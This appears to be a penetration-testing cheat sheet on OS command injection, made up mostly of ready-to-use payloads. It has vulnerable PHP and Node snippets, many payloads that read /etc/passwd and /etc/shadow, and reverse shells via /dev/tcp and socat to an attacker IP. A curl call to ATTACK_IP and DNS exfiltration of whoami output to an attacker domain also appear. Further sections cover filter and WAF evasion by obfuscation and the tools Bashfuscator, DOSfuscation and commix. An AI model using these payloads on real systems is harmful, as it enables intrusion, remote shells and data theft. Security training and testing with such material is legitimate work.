Command Injection

OS Command Injections

PHP Example

exec, system, shell_exec, passthru, or popen functions to execute commands

<?php
if (isset($_GET['filename'])) {
    system("touch /tmp/" . $_GET['filename'] . ".pdf");
}
?>

NodeJS Example

child_process.exec or child_process.spawn

app.get("/createfile", function(req, res){
    child_process.exec(`touch /tmp/${req.query.filename}.txt`);
})

Vulnerable Parameters

Top 25 parameters that could be vulnerable

?cmd={payload}
?exec={payload}
?command={payload}
?execute{payload}
?ping={payload}
?query={payload}
?jump={payload}
?code={payload}
?reg={payload}
?do={payload}
?func={payload}
?arg={payload}
?option={payload}
?load={payload}
?process={payload}
?step={payload}
?read={payload}
?function={payload}
?req={payload}
?feature={payload}
?exe={payload}
?module={payload}
?payload={payload}
?run={payload}
?print={payload}

Detection

Injection Operator	Injection Character	URL-Encoded Character	Executed Command
Semicolon	;	%3b	Both
New Line		%0a	Both
Background	&	%26	Both (second output generally shown first)
Pipe	|	%7c	Both (only second output is shown)
AND	&&	%26%26	Both (only if first succeeds)
OR	|	%7c%7c	Second (only if first fails)
Sub-Shell	``	%60%60	Both (Linux-only)
Sub-Shell	$()	%24%28%29	Both (Linux-only)

;
%3b
\n
%0a
&
%26
|
%7c
&&
%26%26
||
%7c%7c
``
%60%60
$()
%24%28%29

$(curl${IFS}http://ATTACK_IP)

Basic Payloads

<!--#exec%20cmd="/bin/cat%20/etc/passwd"-->
<!--#exec%20cmd="/bin/cat%20/etc/shadow"-->
<!--#exec%20cmd="/usr/bin/id;-->
<!--#exec%20cmd="/usr/bin/id;-->
/index.html|id|
;id;
;id
;netstat -a;
;id;
|id
|/usr/bin/id
|id|
|/usr/bin/id|
||/usr/bin/id|
|id;
||/usr/bin/id;
;id|
;|/usr/bin/id|
\n/bin/ls -al\n
\n/usr/bin/id\n
\nid\n
\n/usr/bin/id;
\nid;
\n/usr/bin/id|
\nid|
;/usr/bin/id\n
;id\n
|usr/bin/id\n
|nid\n
`id`
`/usr/bin/id`
a);id
a;id
a);id;
a;id;
a);id|
a;id|
a)|id
a|id
a)|id;
a|id
|/bin/ls -al
a);/usr/bin/id
a;/usr/bin/id
a);/usr/bin/id;
a;/usr/bin/id;
a);/usr/bin/id|
a;/usr/bin/id|
a)|/usr/bin/id
a|/usr/bin/id
a)|/usr/bin/id;
a|/usr/bin/id
;system('cat%20/etc/passwd')
;system('id')
;system('/usr/bin/id')
%0Acat%20/etc/passwd
%0A/usr/bin/id
%0Aid
%0A/usr/bin/id%0A
%0Aid%0A
& ping -i 30 127.0.0.1 &
& ping -n 30 127.0.0.1 &
%0a ping -i 30 127.0.0.1 %0a
`ping 127.0.0.1`
| id
& id
; id
%0a id %0a
`id`
$;/usr/bin/id
whoami
wh$()oami
whoam$(echo+i)
who'a'm(echo+i)
;id
&& id
| id
$(id)
`id`
& whoami
| whoami
&& whoami
sleep 10
; sleep 10
&& sleep 10
ping -n 10 127.0.0.1 

Bypassing Front-End Validation

Intercept and add input

AND Operator

ping -c 1 127.0.0.1 && whoami

URL-encoding it - see Detection Table or Use Burp

%26%26

OR Operator

ping -c 1 || whoami

%7c%7c - see Detection Table or Use Burp

Execution if the first command fail

Operators

Injection Type	Operators
SQL Injection	' , ; -- /* */
Command Injection	; &&
LDAP Injection	* ( ) & |
XPath Injection	' or and not substring concat count
OS Command Injection	; & |
Code Injection	' ; -- /* */ $() ${} #{} %{} ^
Directory Traversal/File Path Traversal	../ ..\\ %00
Object Injection	; & |
XQuery Injection	' ; -- /* */
Shellcode Injection	\x \u %u %n
Header Injection	\r %0d %0a %09

Blind OS Command Injection

Detection

sleep 10
`sleep 10`
ping burpcollaborator
`ping burpcollaborator`

Blind OS Command InjectionMedium

`ping $(whoami).collaborator_server_dot_com`

Reverse shell

`/bin/sh -i >& /dev/tcp/my_ip>/my_port 0>&1`

Blind OS command injection - Redirect output

& whoami > /var/www/static/whoami.txt &

https://vulnerable.net/image?filename=whoami.txt

Blind OS command injection - out of band OAST

Detection

& nslookup kgji2ohoyw.web-attacker.com &

Exfiltration

& nslookup `whoami`.kgji2ohoyw.web-attacker.com &

WAF

If the error message displayed a different page, with information like our IP and our request, this may indicate that it was denied by a WAF.

Blacklisted Characters

$blacklist = ['&', '|', ';', ...SNIP...];
foreach ($blacklist as $character) {
    if (strpos($_POST['ip'], $character) !== false) {
        echo "Invalid input";
    }
}

Identifying Blacklisted Character

One at a time: 127.0.0.1; - Use URL encoding -see Detection Table or Use Burp

Bypassing Space Filters

Bypass Blacklisted Operators

The new-line character is usually not blacklisted, as it may be needed in the payload itself

Bypass Blacklisted Spaces

127.0.0.1%0a whoami

A space is a commonly blacklisted character, especially if the input should not contain any spaces

Using Tabs

Using tabs (%09) instead of spaces is a technique that may work

127.0.0.1%0a%09

Using $IFS

127.0.0.1%0a${IFS}

Using Brace Expansion

{ls,-la}

total 0
drwxr-xr-x 1 21y4d 21y4d   0 Jul 13 07:37 .
drwxr-xr-x 1 21y4d 21y4d   0 Jul 13 13:01 ..

127.0.0.1%0a{ls,-la}

More space filter bypass:

PayloadsAllTheThings/Command Injection at master · swisskyrepo/PayloadsAllTheThingsGitHub

Bypassing Other Blacklisted Characters

Linux

One technique we can use for replacing slashes (or any other character) is through Linux Environment Variables

echo ${PATH:0:1}

/

127.0.0.1; ls /home

ip=127.0.0.1%0a%09ls%09${PATH:0:1}home

RS Socat

127.0.0.1%0a%27s%27o%27c%27a%27t%27${IFS}TCP4:10.10.14.119:8000${IFS}EXEC:bash

semi-colon character

echo ${LS_COLORS:10:1}

;

semi-colon and a space

127.0.0.1${LS_COLORS:10:1}${IFS}

Windows

slash - cmd:

echo %HOMEPATH:~6,-11%

\

slash - powershell

PS C:\htb> $env:HOMEPATH[0]

\

Character Shifting

slash

echo $(tr '!-}' '"-~'<<<[)

\

semi-colon

echo $(tr '[' ';'<<<[)

;

Bypassing Blacklisted Commands

Commands Blacklist

$blacklist = ['whoami', 'cat', ...SNIP...];
foreach ($blacklist as $word) {
    if (strpos('$_POST['ip']', $word) !== false) {
        echo "Invalid input";
    }
}

Linux & Windows

$ w'h'o'am'i

21y4d

$ w"h"o"am"i

21y4d

127.0.0.1%0aw'h'o'am'i

127.0.0.1%0a%09ls%09${PATH:0:1}home${PATH:0:1}1nj3c70r

cat - Invalid Input

127.0.0.1%0a%09c'a't%09${PATH:0:1}home${PATH:0:1}1nj3c70r${PATH:0:1}flag.txt

Linux Only

backslash \ and the positional parameter character $@ are ignored

who$@ami
w\ho\am\i

Try the above two examples in your payload, and see if they work in bypassing the command filter. If they do not, this may indicate that you may have used a filtered character. Would you be able to bypass that as well, using the techniques we learned in the previous section?

Windows Only

caret (^)

C:\htb> who^ami

21y4d

Advanced Command Obfuscation

Case Manipulation

WHOAMI => WhOaMi

PS C:\htb> WhOaMi

21y4d

$ $(tr "[A-Z]" "[a-z]"<<<"WhOaMi")

21y4d

Replace space (blacklisted) with %09

$(a="WhOaMi";printf %s "${a,,}")

Reversed Commands

echo 'whoami' | rev
imaohw

$ $(rev<<<'imaohw')

21y4d

If you wanted to bypass a character filter with the above method, you'd have to reverse them as well, or include them when reversing the original command.

PS C:\htb> "whoami"[-1..-20] -join ''

imaohw

PS C:\htb> iex "$('imaohw'[-1..-20] -join '')"

21y4d

Encoded Commands

echo -n 'cat /etc/passwd | grep 33' | base64

Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==

bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)

www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin

Tip: Note that we are using <<< to avoid using a pipe |, which is a filtered character.

Replace space (blacklisted) with %09

Even if some commands were filtered, like bash or base64, we could bypass that filter with the techniques we discussed in the previous section (e.g., character insertion), or use other alternatives like sh for command execution and openssl for b64 decoding, or xxd for hex decoding.

PS C:\htb> [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('whoami'))

dwBoAG8AYQBtAGkA

echo -n whoami | iconv -f utf-8 -t utf-16le | base64

dwBoAG8AYQBtAGkA

PS C:\htb> iex "$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))"

21y4d

More Techniques

PayloadsAllTheThings/Command Injection at master · swisskyrepo/PayloadsAllTheThingsGitHub

Obfuscated Commands

$(curl${IFS}http://ATTACK_IP)

List of commands obfuscated as wordlist to test possible WAF filter bypass:

uname
u'n'a'm'e
${uname}
$(uname)
{uname}
{ls,-la}
who$@ami
w\ho\am\i
$(rev<<<'emanu')
bash<<<$(base64 -d<<<dW5hbWUgLWE=)
b'a's'h'<<<$('b'a's'e'6'4 -d<<<dW5hbWUgLWE=)
l's'${IFS}${PATH:0:1}${IFS}-a'l'

List from payloadallthethings (with some change)

cat${IFS}/etc/passwd
cat${IFS}${PATH:0:1}etc${PATH:0:1}passwd
c'a't${IFS}/etc/passwd
c'a't${IFS}${PATH:0:1}etc${PATH:0:1}passwd
c'a't${IFS}${PATH:0:1}e't'c${PATH:0:1}p'a's's'wd
ls${IFS}-la
l's${IFS}-l'a
{cat,/etc/passwd}
cat</etc/passwd
c'a't</e't'c/p'a's's'w'd
cat<${PATH:0:1}etc${PATH:0:1}passwd
c'a't<${PATH:0:1}e't'c${PATH:0:1}p'a's's'w'd
;ls%09-al%09/home
ls%09-al%09/home
l's%09-a'l%09/h'o'm'e
l's%09-a'l%09{PATH:0:1}h'o'm'e
cat%20/et%5C%0Ac/pa%5C%0Asswd
cat%20{PATH:0:1}et%5C%0Ac{PATH:0:1}pa%5C%0Asswd
cat${HOME:0:1}etc${HOME:0:1}passwd
c'a't${HOME:0:1}etc${HOME:0:1}passwd
w'h'o'am'i
wh''oami
w"h"o"am"i
wh""oami
wh``oami
w\ho\am\i
/\b\i\n/////s\h
who$@ami
who$()ami
who$(echo am)i
who`echo am`i

# normal (blocked)
whoami

# null statement (passes)
wh$()oami

# alternative null statement (passes)
whoam$(echo+i)

# alternative statement quotes (passed)
who'a'm(echo+i)

Fuzzing - Cluster bomb

1. List Detection

2. List Obfuscated Commands

cluster bomb

Payload 1 - set to detection list

Payload 2 - set to obfuscated command

Evasion Tools

Linux (Bashfuscator)

GitHub - Bashfuscator/Bashfuscator: A fully configurable and extendable Bash obfuscation framework. This tool is intended to help both red team and blue team.GitHub

$ git clone https://github.com/Bashfuscator/Bashfuscator
$ cd Bashfuscator
$ pip3 install setuptools==65
$ python3 setup.py install --user

$ cd ./bashfuscator/bin/
$ ./bashfuscator -h

$ ./bashfuscator -c 'cat /etc/passwd'

[+] Mutators used: Token/ForCode -> Command/Reverse
[+] Payload:
 ${*/+27\[X\(} ...SNIP...  ${*~}   
[+] Payload size: 1664 characters

$ ./bashfuscator -c 'cat /etc/passwd' -s 1 -t 1 --no-mangling --layers 1

[+] Mutators used: Token/ForCode
[+] Payload:
eval "$(W0=(w \  t e c p s a \/ d);for Ll in 4 7 2 1 8 3 2 4 8 5 7 6 6 0 9;{ printf %s "${W0[$Ll]}";};)"
[+] Payload size: 104 characters

$ bash -c 'eval "$(W0=(w \  t e c p s a \/ d);for Ll in 4 7 2 1 8 3 2 4 8 5 7 6 6 0 9;{ printf %s "${W0[$Ll]}";};)"'

root:x:0:0:root:/root:/bin/bash
...SNIP...

Windows (DOSfuscation)

GitHub - danielbohannon/Invoke-DOSfuscation: Cmd.exe Command Obfuscation Generator & Detection Test HarnessGitHub

PS C:\htb> git clone https://github.com/danielbohannon/Invoke-DOSfuscation.git
PS C:\htb> cd Invoke-DOSfuscation
PS C:\htb> Import-Module .\Invoke-DOSfuscation.psd1
PS C:\htb> Invoke-DOSfuscation
Invoke-DOSfuscation> help

HELP MENU :: Available options shown below:
[*]  Tutorial of how to use this tool             TUTORIAL
...SNIP...

Choose one of the below options:
[*] BINARY      Obfuscated binary syntax for cmd.exe & powershell.exe
[*] ENCODING    Environment variable encoding
[*] PAYLOAD     Obfuscated payload via DOSfuscation

Invoke-DOSfuscation> SET COMMAND type C:\Users\htb-student\Desktop\flag.txt
Invoke-DOSfuscation> encoding
Invoke-DOSfuscation\Encoding> 1

...SNIP...
Result:
typ%TEMP:~-3,-2% %CommonProgramFiles:~17,-11%:\Users\h%TMP:~-13,-12%b-stu%SystemRoot:~-4,-3%ent%TMP:~-19,-18%%ALLUSERSPROFILE:~-4,-3%esktop\flag.%TMP:~-13,-12%xt

C:\htb> typ%TEMP:~-3,-2% %CommonProgramFiles:~17,-11%:\Users\h%TMP:~-13,-12%b-stu%SystemRoot:~-4,-3%ent%TMP:~-19,-18%%ALLUSERSPROFILE:~-4,-3%esktop\flag.%TMP:~-13,-12%xt

test_flag

Tip: If we do not have access to a Windows VM, we can run the above code on a Linux VM through pwsh. Run pwsh, and then follow the exact same command from above.

Payloads

OS_Command_Payload_List/OS-Command-Fuzzing.txt at master · omurugur/OS_Command_Payload_ListGitHub

GitHub - payloadbox/command-injection-payload-list: 🎯 Command Injection Payload ListGitHub

Tools

GitHub - commixproject/commix: Automated All-in-One OS Command Injection Exploitation Tool.GitHub

commix

commix --url=”http://target.com/vuln.php?param=1"

# Some options
-r REQUESTFILE      Load HTTP request from a file.
--crawl=CRAWLDEPTH  Crawl the website starting from the target URL
                        (Default: 1)
--cookie=COOKIE     HTTP Cookie header
--os=OS             Force back-end operating system (e.g. 'Windows' or
                        'Unix').